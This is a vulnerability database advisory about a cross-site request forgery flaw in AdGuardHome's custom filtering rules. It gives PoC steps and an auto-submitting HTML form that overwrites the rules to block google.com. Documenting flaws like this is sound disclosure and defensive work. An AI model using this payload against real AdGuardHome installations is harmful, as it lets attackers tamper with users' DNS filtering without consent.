Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID? What is an MSC vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 11, 2022
OverviewIn AdGuardHome, versions v0.95 through v0.108.0-b.13 are vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules.
DetailsAdGuardHome is vulnerable to Cross-Site Request Forgery (CSRF), in the custom filtering rules functionality. An attacker can persuade an authorized user to follow a malicious link, resulting in deleting/modifying the custom filtering rules.
PoC DetailsSign in with an admin account. Navigate to filters, under which select custom filtering rules, where existing rules are visible. Now open the CSRF file hosted on the attacker's server at the victim’s end. The source code of the file will be provided in the POC section below. You will notice the rule has been changed in custom filtering rules, blocking the “google.com” domain. Now try accessing “google.com” in a new tab. You will see that you can no longer connect.
<html> <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"> <form id="myForm" name="myForm" action="http://192.168.1.153/control/filtering/set_rules" method="POST" enctype="text/plain"> <input type="text" name="/google.com(" value=")?/"> <input type="submit"/> </form> </body> </html>
Affected EnvironmentsAdGuardHome versions v0.95 through v0.108.0-b.13
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||None|
|User Interaction (UI):||Required|